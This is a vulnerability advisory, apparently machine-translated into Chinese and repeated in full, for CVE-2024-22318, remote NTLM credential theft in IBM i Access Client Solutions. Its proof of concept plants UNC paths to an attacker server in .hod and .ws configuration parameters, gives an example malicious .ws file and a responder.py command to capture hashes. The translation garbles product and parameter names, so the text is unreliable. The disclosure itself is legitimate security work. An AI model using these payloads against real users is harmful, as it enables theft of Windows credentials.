[+] Credits: John Page(又名Hyp3rlinx)
[+]网站: hyp3rlinx.altervista.org
[+]源: http://hyp3rlinx.altervista.org/ADV...TE_CREDENTILAL_THEFT_THEFT_CVE-2024-22318.TXT
[+] twitter.com/hyp3rlinx
[+] ISR: Aptaritionsec
[小贩]
www.ibm.com
[产品]
IBM我访问客户端解决方案
[版本]
全部
[补救/修复]
没有任何
[漏洞类型]
远程凭据盗用
[CVE参考]
CVE-2024-22318
[安全问题]
IBM i访问客户端解决方案(ACS)在Windows Workstations上启用NT LAN Manager(NTLM)时容易受到远程凭据盗用的影响。
攻击者可以在ACS 5250显示终端配置“ .hod”或“ .ws”文件中创建功能强大的路径,以指向敌对服务器。
如果启用了NTLM,并且用户打开了一个攻击者提供的文件,则Windows操作系统将尝试使用当前用户的会话进行身份验证。
然后,攻击者控制的服务器可以捕获NTLM哈希信息以获取用户的凭据。
[参考]
[漏洞/POC]
客户端访问.HOD文件脆弱参数:
1)Screen HistoryArchorArchiveLocation=\\ Attacker-Server \ RemotecredTheftp0c
[keyRemapfile]
2)filename=\\攻击者- 服务器\ remotecredtheftp0c
接下来,kali linux responder.py捕获: responder.py -i eth0 -a -vv
客户端访问遗产.ws文件脆弱参数:
DefaultKeyboard=\\ tactioner-server \ remotecredTheftp0c
例如,客户端访问较旧的.ws文件
[轮廓]
id=WS
版本=9
[telnet5250]
AssocedPrinterStartMinimized=n
AssocedPrinterTimeOut=0
sslclientauthentication=y
主机名=PWN
相关性互动=n
安全=CA400
certSelection=自动选择
autoreconnect=y
[Keepalive]
keepalivetimeout=0
[键盘]
ibmdefaultKeyboard=n
DefaultKeyboard=\\ tactioner-server \ remotecredTheftp0c
[沟通]
link=telnet5250
[网络访问]
偏僻的
[严重性]
中等的
[披露时间表]
供应商Notification: 2023年12月14日
供应商地址问题: 2024年2月7日
2024年2月8日:公共披露
[+]免责声明
本建议中包含的信息“按原样”提供,没有任何使用或其他情况的保证或保证。
特此授予此建议的重新分配,只要除了对其进行改革,没有对其进行更改,并且
给予应有的信用。如果适当的信用
被给予作者。作者对此处包含的信息概不负责,并且接受不责任
对于使用或滥用此信息造成的任何损害。作者禁止任何恶意使用与安全有关的信息
或作者或其他地方的利用。所有内容(c)。
HYP3RLINX
[+]网站: hyp3rlinx.altervista.org
[+]源: http://hyp3rlinx.altervista.org/ADV...TE_CREDENTILAL_THEFT_THEFT_CVE-2024-22318.TXT
[+] twitter.com/hyp3rlinx
[+] ISR: Aptaritionsec
[小贩]
www.ibm.com
[产品]
IBM我访问客户端解决方案
[版本]
全部
[补救/修复]
没有任何
[漏洞类型]
远程凭据盗用
[CVE参考]
CVE-2024-22318
[安全问题]
IBM i访问客户端解决方案(ACS)在Windows Workstations上启用NT LAN Manager(NTLM)时容易受到远程凭据盗用的影响。
攻击者可以在ACS 5250显示终端配置“ .hod”或“ .ws”文件中创建功能强大的路径,以指向敌对服务器。
如果启用了NTLM,并且用户打开了一个攻击者提供的文件,则Windows操作系统将尝试使用当前用户的会话进行身份验证。
然后,攻击者控制的服务器可以捕获NTLM哈希信息以获取用户的凭据。
[参考]
正在加载...
www.ibm.com
客户端访问.HOD文件脆弱参数:
1)Screen HistoryArchorArchiveLocation=\\ Attacker-Server \ RemotecredTheftp0c
[keyRemapfile]
2)filename=\\攻击者- 服务器\ remotecredtheftp0c
接下来,kali linux responder.py捕获: responder.py -i eth0 -a -vv
客户端访问遗产.ws文件脆弱参数:
DefaultKeyboard=\\ tactioner-server \ remotecredTheftp0c
例如,客户端访问较旧的.ws文件
[轮廓]
id=WS
版本=9
[telnet5250]
AssocedPrinterStartMinimized=n
AssocedPrinterTimeOut=0
sslclientauthentication=y
主机名=PWN
相关性互动=n
安全=CA400
certSelection=自动选择
autoreconnect=y
[Keepalive]
keepalivetimeout=0
[键盘]
ibmdefaultKeyboard=n
DefaultKeyboard=\\ tactioner-server \ remotecredTheftp0c
[沟通]
link=telnet5250
[网络访问]
偏僻的
[严重性]
中等的
[披露时间表]
供应商Notification: 2023年12月14日
供应商地址问题: 2024年2月7日
2024年2月8日:公共披露
[+]免责声明
本建议中包含的信息“按原样”提供,没有任何使用或其他情况的保证或保证。
特此授予此建议的重新分配,只要除了对其进行改革,没有对其进行更改,并且
给予应有的信用。如果适当的信用
被给予作者。作者对此处包含的信息概不负责,并且接受不责任
对于使用或滥用此信息造成的任何损害。作者禁止任何恶意使用与安全有关的信息
或作者或其他地方的利用。所有内容(c)。
HYP3RLINX